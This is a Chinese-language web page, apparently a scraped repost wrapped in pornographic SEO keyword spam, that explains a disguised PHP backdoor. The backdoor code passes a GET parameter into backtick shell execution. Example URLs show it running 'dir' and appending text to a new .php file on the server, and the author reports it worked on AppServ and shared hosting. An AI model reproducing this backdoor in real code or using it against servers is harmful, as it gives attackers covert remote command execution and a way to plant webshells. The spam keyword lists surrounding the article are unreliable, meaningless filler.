天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

一個不易被發(fā)現(xiàn)的PHP后門代碼解析

偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個一般的phper都不怎么關(guān)注的反撇號 ` ,反撇號包含的字符串,等同于shell_exec函數(shù)。

偽裝性很好,很容易被管理員忽略。

$selfNums = $_GET['r'];if (isset($selfNums)){  echo `$selfNums`;}

剛看到這段代碼我想大家都會說沒有問題,但是細(xì)心的朋友也會發(fā)現(xiàn)下面的變量被一個符號包起來了,既然是變量為什么要這樣了,

而且又不是單引號,這個就是關(guān)鍵所在了,這個符號是 Esc 下面的一個鍵(位于感嘆號!旁邊的),

通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:/web/90sec.php

我用 appserv 和虛擬主機(jī)已經(jīng)測試成功。

php技術(shù)一個不易被發(fā)現(xiàn)的PHP后門代碼解析,轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請第一時間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 扒开老师大腿猛进AAA片软件 | 国产手机在线亚洲精品观看 | 亚洲黄色网页 | 午夜福到在线2019 | 久久国产综合精品欧美 | 国产跪地吃黄金喝圣水合集 | 色偷偷7777www | 久久免费精品国产72精品剧情 | 国产精品资源在线观看网站 | 国产AV亚洲精品久久久久 | 欧美AAAA片免费播放观看 | 久久综合伊人 | 又黄又粗又爽免费观看 | 国家产午夜精品无人区 | 久久九九久精品国产尤物 | 女教师公车痴汉在线播放 | 日日摸夜夜嗷嗷叫日日拍 | 久色乳综合思思在线视频 | 国产精品久久久久久人妻精品蜜桃 | 乱码中字在线观看一二区 | 国产又粗又猛又爽黄老大爷 | 亚洲字幕在线观看 | 亚洲男女羞羞无遮挡久久丫 | 午夜神器老司机高清无码 | 久久精品视频15人人爱在线直播 | 日本亚洲中文字幕无码区 | 中文字幕无线手机在线 | 影音先锋xfplay影院av | 国产青青草原 | 羞羞答答的免费视频在线观看 | 亚洲三级在线看 | 国产超嫩一线天在线播放 | 永久免费精品影视网站 | 蜜桃视频无码区在线观看 | 无套内射在线观看THEPORN | 蜜柚影院在线观看免费高清中文 | 美女也烦恼主题曲 | 亚洲AV人无码综合在线观看蜜桃 | 99热久久视频只有精品6 | 日久精品不卡一区二区 | 麻豆第一区MV免费观看网站 |